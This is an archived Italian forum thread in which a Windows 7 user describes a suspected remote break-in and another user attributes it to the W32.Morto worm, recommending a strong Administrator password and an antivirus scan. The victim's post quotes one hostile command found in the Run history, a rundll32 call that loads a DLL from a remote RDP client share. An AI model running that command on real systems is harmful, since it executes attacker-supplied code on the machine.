PDA

View Full Version : Forse qualcuno è entrato nel mio pc


giando76
11-12-2011, 19:07
Salve a tutti,
ho un pc con windows 7 e mentre ero al computer, mi sono allontanato un attimo, mentre mi stavo alzando dalla sedia ho notato che lo schermo di è abbuiato e dopo uno qualche secondo e riapparsa la maschera di logon.
Gli utenti sono administrator e PinkoPallino. Io mi loggo sempre come pinkopallino anche perché administrator non mi appare perchè disabilitato, ma stavolta apparivano entrambi. Ho provato ad entrare come pinkopallino, ma una seconda maschera mi ha informato che l'accesso era già stato effettuato con l'utente administrator. A questo punto ho provato ad entrare come adminiatrator, mi sono detto probabilmente l'avrò abilitato io tempo fa per un esigenza del momento e ora non mi ricordo, comunque ho provato ad entrare come administrator mettendo un eventuale password fittizia che io avrei messo e sono riuscito ad entrare entrando mi sono ritrovato sul desktop una schermata d'errore relativa al'avvio del servizio tsclient e in più in start----->esegui avevo il comando

rundll32 \\tsclient\a\a.dll a


Io penso che qualcuno mi sia entrato da remoto. Vorrei sapere se è possibile trovare qualche traccia della connessione fatta al mio pc, tipo l'IP della persona che ha cercato di accedere .. ecc..

Grazie 1000
G.

Chill-Out
13-12-2011, 21:46
La descrizione del problema fa pensare a W32.Morto premurati di assegnare all'Account Administrator una password robusta, dopodichè fai scansione con tuo AV residente.

giando76
21-12-2011, 07:39
ok grazie 1000 a tutti

igiolo
03-01-2012, 11:17
HMMMM....buono a sapersi..:D